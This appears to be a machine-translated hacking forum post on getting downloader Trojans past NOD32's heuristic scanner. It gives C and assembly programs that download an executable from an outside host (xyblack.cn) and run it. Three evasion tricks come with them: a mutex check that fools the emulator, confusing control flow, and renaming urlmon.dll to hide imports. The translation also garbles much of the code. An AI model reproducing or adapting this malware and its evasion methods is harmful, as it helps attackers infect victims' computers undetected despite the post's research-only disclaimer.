Experience in locating and eliminating NOD32

Experience in locating and eliminating NOD32

---- Collect dying site: http://www.idying.cn

Welcome to discuss

First, let's talk about the positioning method:

1 NOD32 cannot be positioned in a forward direction. It cannot be modified if it is located! For NOD32, select reverse positioning. the start position is 400.

Filling is not necessarily 90, so that any current filling 90 is sometimes disturbed.

2. Use exclusion

Collect the methods for eliminating NOD32 attacks

Source code:

1
Code-free alternative method function delay Loading
Example:

Copy the content to the clipboard program code
# Pragma comment (Lib, "delayimp. lib"); // required

# Pragma comment (linker, "/delayload: advapi32.dll ")
# Pragma comment (linker, "/delay: Unload ")
# Pragma comment (Lib, "advapi32.lib") // Add this line.

2

Multi-thread anti-NOD32 heuristic Investigation

Copy the content to the clipboard program code
/*--------------------------------------
/Author: gtr4 [o.s. T]
/Email: 502440115@qq.com
/Time: 2009/8/29
/From: www.3est.com
/Copyright (c) 2009 gtr4.
/
/Just for fun!
/Do It, do our best!
*/--------------------------------------

Int apientry winmain (hinstance,
Hinstance hprevinstance,
Lpstr lpcmdline,
Int ncmdshow)
{
Char strappname [] = "gtr4 ";
Char strpath [max_path];
Handle hmutex = NULL;
// Create a mutex object
Hmutex = createmutex (null, false, strappname );
If (hmutex! = NULL)
{
If (getlasterror () = error_already_exists)
{
MessageBox (null, "two", "", 0 );
// Virus thread GW ~
Urldownloadtofile (null, "http: //. EXE", "C: \ test.exe", 0, null );
ShellExecute (0, "open", "C: \ test.exe", null, null, sw_show );
}
Else
{
MessageBox (null, "one", "", 0 );
Getmodulefilename (getmodulehandle (null), strpath, sizeof (strpath ));
Winexec (strpath, sw_hide );
Sleep (1000 );
Exitprocess (-1 );
}
}
Return 0;
}

3. Some Baidu Materials

Next we will thoroughly analyze the inspiration mechanism of NOD32:

I still use a simple Downloader to analyze instances. This does not matter because the NOD32 mechanism is the same. You can use any of these methods, such as Trojans or viruses ..

Heuristic scanning should be attributed to the file scanning engine, so we should call it heuristic scanning. Therefore, NOD32 is not only a heuristic scan, but also applies the traditional pattern matching technology (pattern matching technology is used to intercept virus samples and perform reverse analysis manually, this is a tribute to the NOD32 virus sample analyst handsome guys who find some special places for this sample and store these special places as signatures in the virus database with their names, for example, the naming rule of NOD32 is generally "platform/definition name, for example Win32/trojandownloader ). Inspired by NOD32, we can also see the file monitoring options on the console.

We can see that it has an option for advanced heuristic scanning. If we select this option, the scanning engine will call the advanced heuristic scanning process only when scanning files. Therefore, you must check this option. O (Rule _ rule) O... otherwise, if the NOD32 virus database does not match the pattern, you will be over ..

NOD32 is more intelligent and efficient, one reason is that it divides some functions into some specific combinations. For example, to download and execute it right away is a typical downloading behavior. Therefore, NOD32 generally uses download and execution as the basis for downloading. (Of course, more judgment may be required, for example, to determine whether the program has other behaviors. If it is only for download execution, it must be a Downloader ).

Let's do a test and write a piece of code, just to download it. NOD32 does not scan and kill. The Code is as follows:
Code:

Format PE guis 4.0 \
On '% include % \ stub.txt'

Entry _ start

Include 'win32ax. inc'

. Text

_ Start:

Xor esi, ESI

I urldownloadtocachefile, ESI, szurl, szpath, pathsize, ESI, ESI

RET

; /// // Data ///// //////////////////////////
. Data

Szurl dB 'HTTP: // www.xyblack.cn/s.exe', 0
Szpath dB 'C: \ 1.exe ', 0
Pathsize = $-szpath

. Idata

Library urlmon, 'urmon. dll'

Include 'api \ urlmon. inc'

After the above Code is compiled, NOD32 does not report any virus.

However, if any execution function (such as I winexec, szpath, sw_hide) is added after I urldownloadtocachefile, ESI, szurl, szpath, pathsize, ESI, and ESI, NOD32 reports the virus. The best thing about NOD32 is that it will analyze the program introduction table. For example, most download and execution functions exist in urlmon. DLL, kernel32.dll, and wininet. the DLL is medium, so our program only needs to introduce urlmon. DLL or kernel32.dll, and as long as the urldownloadtocachefile function is used in the program and kernel32.dll is introduced, NOD32 reports viruses, which undoubtedly simplifies a lot of efficiency, but reports false positives, for example, for a program compiled by a compiler that can build a PE Structure, if kernel32.dll is introduced but the function is only a download, you will report the virus, which is undoubtedly a false positive ....
However, for an excellent antivirus software such as NOD32, it does not determine whether you introduce these dangerous functions and directly defines you as a virus, because many normal programs will call these functions. Based on the virtual machine code simulation technology, it will focus on the analysis of the functions you introduce and analyze their behavior and parameters.
So is NOD32 so hard to break through? In this case, we will break through the NOD32 inspiration mechanism from two perspectives.

Breakthrough Method 1:

Because NOD32 is based on virtual machines, the first method is based on virtual machines. The essence is the judgment of thinking logic. NOD32 uses virtual machine code simulation, so I will give you a piece of normal code on it. (Note: The previous general idea was found by a friend, but the entire idea and idea below are my own thoughts)

Example:

I getmodulefilename, ESI, EBX, max_path

I winexec, EBX, sw_hide

I exitprocess, 0

This is normal. Obtain your own file path and exit after running. I think the NOD32 engine has been determined to be a normal program by analyzing the virtual machine. Because, especially at the address of the exitprocess function, it indicates that the program has exited ..
Let's take a closer look. The above shows how to get your own path and then run it yourself. In this case, we only need to let it determine that we have already run it during the second operation, so that it can jump to a specific address for execution. This address is our Trojan code. Because NOD32 analyzes our Trojan every time and is running for the first time, our judgment is absolutely not implemented, so the command will only execute the code, therefore, NOD32 is forced to think that this is a normal program code. To escape the inspiration of NOD32.

The implementation code is as follows:

Code:

Format PE guis 4.0 \
On '% include % \ stub.txt'

Entry _ start

Include 'win32ax. inc'

. Text

_ Start:

Xor esi, ESI

I createevent, ESI, szmutex

I getlasterror

Or eax, eax

JNE @ F

MoV EBX, szname

I getmodulefilename, ESI, EBX, max_path

I winexec, EBX, sw_hide

I sleep, 1000

JMP _ end


@@:

I urldownloadtofile, ESI, szurl, szpath, ESI, ESI

I winexec, szpath, sw_show

_ End:

I exitprocess, 0

; /// // Data ///// //////////////////////////

Section '. data' data readable writeable

Szmutex dB 'woaihahaha', 0

Szurl dB 'HTTP: // www.xyblack.cn/s.exe', 0

Szpath dB 'f: \ 2.exe ', 0

Szname RB max_path

. Idata

Library urlmon, 'urlmon. dll ',\
Kernel32, 'kernel32. dll'

Include 'api \ urlmon. inc'
Include 'api \ kernel32.inc'

Explanation: in fact, a function is added to create a namespace kernel. Since the first run of the namespace object function is successfully created, we have determined based on this principle, if the creation fails, run the download function again, and the function for creating the named kernel object will fail only when the created named kernel object already exists, if NOD32 is used to simulate this command, it is successfully created. Therefore, it will execute the following file path for obtaining the program, then run itself, and exit the program. It is considered safe when it is analyzed to exit the program. During the second running of our program, the creation failed because the kernel object already exists. Then, we will execute the download and execution functions ..

In this way, we can easily break through the NOD32 inspiration mechanism ..

Breakthrough Method 2:

This breakthrough solution is based on the simulation thinking logic of NOD32 virtual machine code. Since NOD32 is based on virtual machines, I think I have carefully designed a function to make it an error. It is wrong to simulate and analyze it here. I think it will definitely not analyze this function again, so it will definitely analyze the following command, which will analyze the execution function and think it is just a program that executes the file, therefore, it is also considered safe .. Haha, this is also a simple breakthrough in the NOD32 inspiration.

Code:

Code:

Format PE guis 4.0 \
On '% include % \ stub.txt'

Entry _ start

Include 'win32ax. inc'

. Text

_ Start:

Xor esi, ESI

MoV EDI, EDI

Xor ebx, EBX

JMP @ F

_ L1:
MoV EDI, szurl

MoV EBX, szpath
@@:
I urldownloadtofile, ESI, EDI, EBX, ESI, ESI

Or eax, eax

JNE _ L1


I winexec, szpath, sw_hide

I exitprocess, 0

; /// // Data ///// //////////////////////////
. Data

Szurl dB 'HTTP: // www.xyblack.cn/s.exe', 0
Szpath dB 'C: \ 1.exe ', 0

Pathsize = $-szpath

. Idata

Library urlmon, 'urlmon. dll ',\
Kernel32, 'kernel32. dll'

Include 'api \ urlmon. inc'
Include 'api \ kernel32.inc'

Breakthrough method 3:

This method is obtained based on dynamic addresses, because during my analysis, NOD32 is very insensitive to obtaining DLL from non-system libraries .. Because loadlibrary and getprocaddress are combined, I think NOD32 will definitely put this function combination in a specific matching package. However, when NOD32 analyzes loadlibrary parameters during analysis, if this parameter points to a non-system DLL, NOD32 does not focus on the analysis, this may be a user's DLL, and the output interface name is the same. Some people may say that I write a DLL myself, implement a download process, and then output the interface. You need to know that the DLL you write is still introduced to the output interface of the system DLL, so it is still killed by NOD32. But this is a non-toxic operating system, and it becomes toxic by changing its name. Haha

Code:

Code:

Format PE guis 4.0 \
On '% include % \ stub.txt'

Entry _ start

Include 'win32ax. inc'

Section '. text' code readable writeable executable

Sztext dB 'urldownloadtofilea', 0

Szurl dB 'HTTP: // www.xyblack.cn/bitmap.exe', 0

Szpath dB 'C: \ 1.exe ', 0

Szdll db' \ urlmon. dll ', 0, 0

Sznewpath dB 'C: \ 3. dll ', 0

Szwindowpath RB max_path

_ Start:

I getsystemdirectory, szwindowpath, max_path

MoV EDI, szwindowpath

Repne scasb

MoV ECx, 4

MoV ESI, szdll

Rep movsd

I copyfile, szwindowpath, sznewpath, false

I loadlibrary, sznewpath

I getprocaddress, eax, sztext

Xor esi, ESI

Stdcall eax, ESI, szurl, szpath, ESI, ESI

I winexec, szpath, sw_hide

RET

; /// // Data ///// //////////////////////////

. Idata

Library Kernel32, 'kernel32. dll'

Include 'api \ kernel32.inc'

I hope this article will attract the high attention of NOD32 and help you understand the inspiration mechanism in depth. This article is only used for technical research, I am not responsible for any illegal activities using the technology mentioned in this article .. I think there should be any article on the Internet that can be analyzed by examples like this. Finally, I wish the Olympic Games in my motherland a success !!!!!